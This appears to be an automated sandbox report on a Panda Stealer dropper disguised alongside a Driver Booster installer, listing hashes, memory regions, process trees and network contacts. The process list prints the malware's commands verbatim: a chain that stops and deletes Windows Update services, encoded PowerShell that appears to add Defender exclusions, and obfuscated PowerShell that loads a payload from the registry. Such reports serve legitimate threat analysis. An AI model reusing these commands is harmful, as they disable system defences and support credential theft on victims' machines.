SHA1 29f6484fafd50f0c00b5be01d97e82ffeda6f75b
SHA256 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7
SHA512 f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

\Users\Admin\AppData\Local\Temp\is-RQJ8V.tmp\driver_booster_setup.tmp

MD5 68b52a0b8e3d45bf3b520a0e7f16dad1
SHA1 e50408326eafb5ca8adc70db29c33b64e25bbbbd
SHA256 b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b
SHA512 b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

MD5 0e31bfc197cf7557b6ba5c18ecb1e5b2
SHA1 78ec7c8f28568611cf524f30b67875e031a09cb2
SHA256 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78
SHA512 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0

memory/2484-40-0x000000013F820000-0x000000013FAD4000-memory.dmp

memory/2484-46-0x000000001C250000-0x000000001C4EA000-memory.dmp

memory/2484-48-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2484-47-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

memory/2512-49-0x0000000000240000-0x0000000000241000-memory.dmp

memory/1760-55-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/1760-57-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

memory/1760-56-0x0000000002810000-0x0000000002818000-memory.dmp

memory/1760-58-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1760-59-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1760-60-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

memory/1760-61-0x00000000028D0000-0x0000000002950000-memory.dmp

memory/1760-62-0x000007FEF1C90000-0x000007FEF262D000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp\DriverBooster.exe

MD5 5ff2b8b8bf24896093f7e44374fabf95
SHA1 69bc407fe124e7e475a90cb9702f768a4b412da3
SHA256 77b5f3864c9ded87ccdc2c550d1ac107c918c224ee9aeada6f3fd8834f935d91
SHA512 391ea2b19131d73f194afc2ddd594f8648e6acd9c0a7fabffcff1fb27d83ddbd91367bfbf32f7b354d31ae931dea04b73045236eb98848d65fe4de8ee02fb50e

C:\Users\Admin\AppData\Local\Temp\is-T9RCE.tmp-dbinst\setup.exe

MD5 3d403676517f6a99de035a04dc3f3f82
SHA1 ed69d8f485374dfb58a5b651b1f3f1bab8ee9541
SHA256 668f4f4ef277783cc66408d6631b63e9a24ffcd978834835fdb8fb2aa345a56e
SHA512 4ba6f75e9b518474bf9b846cda386bde0ca65233dd489b357b967e842af71ebca6e325b9fc9b8a0d1d775b16198ff31a6c2d2223797d2a3c490d5da001e8887e

memory/1596-98-0x0000000000270000-0x0000000000271000-memory.dmp

memory/1596-177-0x0000000002F00000-0x0000000002F40000-memory.dmp

memory/2512-191-0x0000000000400000-0x0000000000531000-memory.dmp

memory/2880-193-0x0000000000400000-0x000000000042C000-memory.dmp

memory/2484-194-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

C:\ProgramData\IObit\iobitpromotion.ini

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Temp\1713116764\ENGLISH.lng

MD5 8e7f2723f0e72bc6abefca738c9c1ca4
SHA1 969a4a6f31e146040a101d526886ede9a7c5c432
SHA256 f3c690feab9ab2b7dea8ea6334b484768f19caaf85dfa14be2bce5e4fdbffd4b
SHA512 9a3efa9dd002394050cbd457adb67121fcae7a31b66b42e3d612725b9166bd76c4f8c73ed039226c16248461c7f4f1fb6cac91960b7bb57a3273fbd022b1e232

memory/2484-214-0x0000000002340000-0x00000000023C0000-memory.dmp

memory/2676-216-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-217-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-221-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-222-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-220-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-219-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-218-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2484-215-0x0000000000690000-0x0000000000696000-memory.dmp

memory/2676-224-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

memory/2676-223-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-230-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-240-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2484-242-0x000007FEF5380000-0x000007FEF5D6C000-memory.dmp

memory/2676-228-0x0000000140000000-0x0000000140056000-memory.dmp

memory/2676-226-0x0000000140000000-0x0000000140056000-memory.dmp

memory/1596-247-0x0000000000400000-0x0000000000A17000-memory.dmp

memory/2556-248-0x000000013F450000-0x000000013F704000-memory.dmp

memory/2556-249-0x000007FEF4990000-0x000007FEF537C000-memory.dmp

memory/2208-250-0x0000000019EB0000-0x000000001A192000-memory.dmp

memory/2208-251-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp

memory/2208-253-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/2208-252-0x00000000008C0000-0x00000000008C8000-memory.dmp

memory/2208-256-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/2208-257-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/1596-258-0x0000000000270000-0x0000000000271000-memory.dmp

memory/2208-261-0x0000000076D40000-0x0000000076E5F000-memory.dmp

memory/2312-262-0x0000000140000000-0x0000000140042000-memory.dmp

memory/2556-264-0x0000000000EB0000-0x0000000000F30000-memory.dmp

memory/1472-266-0x00000000015C0000-0x0000000001600000-memory.dmp

memory/2312-270-0x0000000076D40000-0x0000000076E5F000-memory.dmp

memory/2208-269-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2312-268-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2208-267-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp

memory/2312-265-0x0000000140000000-0x0000000140042000-memory.dmp

memory/2208-260-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/2208-259-0x0000000001680000-0x00000000016C0000-memory.dmp

memory/2208-271-0x0000000076D40000-0x0000000076E5F000-memory.dmp

memory/1472-275-0x00000000015C0000-0x0000000001600000-memory.dmp

memory/1472-277-0x0000000072BB0000-0x000000007315B000-memory.dmp

memory/436-278-0x0000000000B70000-0x0000000000B93000-memory.dmp

memory/1596-279-0x0000000002F00000-0x0000000002F40000-memory.dmp

memory/436-282-0x0000000000B70000-0x0000000000B93000-memory.dmp

memory/2312-283-0x0000000076E60000-0x0000000077009000-memory.dmp

memory/436-285-0x0000000000CC0000-0x0000000000CEA000-memory.dmp

memory/436-287-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

memory/1472-281-0x00000000015C0000-0x0000000001600000-memory.dmp

memory/1472-273-0x0000000072BB0000-0x000000007315B000-memory.dmp

memory/2312-272-0x0000000140000000-0x0000000140042000-memory.dmp

memory/2208-255-0x00000000014D0000-0x0000000001550000-memory.dmp

memory/2208-254-0x000007FEF2A60000-0x000007FEF33FD000-memory.dmp

memory/436-292-0x0000000000CC0000-0x0000000000CEA000-memory.dmp

memory/480-290-0x00000000001E0000-0x000000000020A000-memory.dmp

memory/436-289-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

memory/768-315-0x0000000000230000-0x000000000025A000-memory.dmp

memory/688-313-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

memory/688-311-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

memory/688-309-0x00000000003E0000-0x000000000040A000-memory.dmp

memory/616-306-0x0000000036EA0000-0x0000000036EB0000-memory.dmp

memory/616-304-0x000007FEBE920000-0x000007FEBE930000-memory.dmp

memory/616-302-0x0000000000410000-0x000000000043A000-memory.dmp

memory/436-398-0x0000000076EB1000-0x0000000076EB2000-memory.dmp

memory/1852-415-0x0000000000290000-0x0000000000298000-memory.dmp

memory/1472-413-0x0000000077050000-0x0000000077126000-memory.dmp

memory/1472-412-0x0000000072BB0000-0x000000007315B000-memory.dmp

C:\Windows\Tasks\dialersvc32.job

MD5 5d1e3ddd710c22a98c395c4ddf70d1d6
SHA1 617e9fbaf1faf9d8467f918ea38175313ccd8e9e
SHA256 428ac3eb102e83da4bf95f6349fbfcdaffe44555bc1e714518982fd520356bdb
SHA512 cc2bb444d351a5894af09666dbf01f608399c67a7d4debddaec96dc5ec8b87c7994543be44ec126102381aa43a0a56d8da696a8fbff90e817b5a026683fac2df

memory/1852-438-0x000000000151B000-0x0000000001582000-memory.dmp

memory/1852-439-0x000007FEEE690000-0x000007FEEF02D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-14 17:33

Reported

2024-04-14 17:46

Platform

win10v2004-20240412-en

Max time kernel

16s

Max time network

11s

Command Line

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

Signatures

Panda Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

PandaStealer

stealer pandastealer

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3608 set thread context of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A (5 launches)

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3952 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 3952 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 3952 wrote to memory of 1096 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe
PID 3952 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 3952 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 3952 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\lrucache.exe
PID 3952 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 3952 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe
PID 1096 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
PID 1096 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
PID 1096 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp
PID 3608 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3608 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe
PID 3608 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\cmd.exe
PID 3608 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\cmd.exe
PID 2464 wrote to memory of 3296 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3608 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe C:\Windows\System32\conhost.exe
PID 3364 wrote to memory of 3284 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 2464 wrote to memory of 4212 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe

"C:\Users\Admin\AppData\Local\Temp\23ea93b8cd4623488d36102560272d0f92e6dd70e3534008b21f1662d2224b00.exe"

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

"C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

"C:\Users\Admin\AppData\Local\Temp\lrucache.exe"

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

"C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe"

C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp" /SL5="$9017E,28225140,139264,C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AbgBrAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AHgAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAGoAIwA+AA=="

C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe

"C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\setup.exe" "C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe" /title="Driver Booster 10" /dbver=10.4.0.128 /eula="C:\Users\Admin\AppData\Local\Temp\is-TIEOM.tmp-dbinst\EULA.rtf" /showlearnmore /pmtproduct /nochromepmt

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{0bfb6594-2045-438a-a5c3-bc91e2af0f2c}

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHYAcwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAG8AcABlAHIAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYgBjADMAOQAwADIAZAA4ADEAMwAyAGYANAAzAGUAMwBhAGUAMAA4ADYAYQAwADAAOQA5ADcAOQBmAGEAOAA4AFwAVwBDAEMATgBhAHQAaQB2AGUASABvAHMAdAAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdwB5AHEAIwA+AA=="

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 f0854165.xsph.ru udp
RU 141.8.193.236:80 f0854165.xsph.ru tcp
US 8.8.8.8:53 11.2.37.23.in-addr.arpa udp
US 8.8.8.8:53 236.193.8.141.in-addr.arpa udp
US 8.8.8.8:53 update.iobit.com udp
US 152.199.20.140:80 update.iobit.com tcp
US 8.8.8.8:53 140.20.199.152.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\driver_booster_setup.exe

MD5 ccc48304afa2e7c58492babc297db8a4
SHA1 decd98730cf34e1567965f6fb7085569fc1053e8
SHA256 e02061a4626f950b41d89c21e9a780f8aee5c5ddda7880b753d660db09117910
SHA512 79bd4dda233b714ecd6746c5f78f9d441852e333202fc74da6430d23d7dc1deadebb5a5608da63ac63ee0891a99ee259d3498d58ac59621226d8bf7862de4b04

C:\Users\Admin\AppData\Local\Temp\lrucache.exe

MD5 6a4308bc229b64cf5bc6d359056b8980
SHA1 29f6484fafd50f0c00b5be01d97e82ffeda6f75b
SHA256 5d6c06c7b142cf4e07d354d2b96bcf5c0c413aa0578527ac5e329f1e78ce7bd7
SHA512 f4fb4b336a01ccff7bf527f8986098ea57100c3f367a6119515c73dd910fdbaf42c3401d624229a0fbbc85f57a36b889b681227f7f6d186b1aaa0100ea3b7364

C:\Users\Admin\AppData\Local\Temp\WCCNativeUpdate.exe

MD5 0e31bfc197cf7557b6ba5c18ecb1e5b2
SHA1 78ec7c8f28568611cf524f30b67875e031a09cb2
SHA256 87890cb7476446f228fe1edaf236bd4e02d0f6372805a309bf2773ec64737d78
SHA512 700b21c7be3d558970c137cded2e6079b5f2d5ce12495c576a281d210f32c3de3b0369bcfefcf7f666465498c6010c7d33001c098bbe08c2a2f23c10ff67a2e0

C:\Users\Admin\AppData\Local\Temp\is-3B9CA.tmp\driver_booster_setup.tmp

MD5 68b52a0b8e3d45bf3b520a0e7f16dad1
SHA1 e50408326eafb5ca8adc70db29c33b64e25bbbbd
SHA256 b409d6d6f8896dc2afd1774479c741ca253c0e9b4732daaa08af84aa9c96888b
SHA512 b8e0b486e2b9652831eb8efe48cf9575eef49204e827a64d69ae7c9c30304b2d98a66c28f1072fe8596847c15f13bbf7ec39d7708684ff64051bbae7ed063faf

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tlisho2t.vpb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

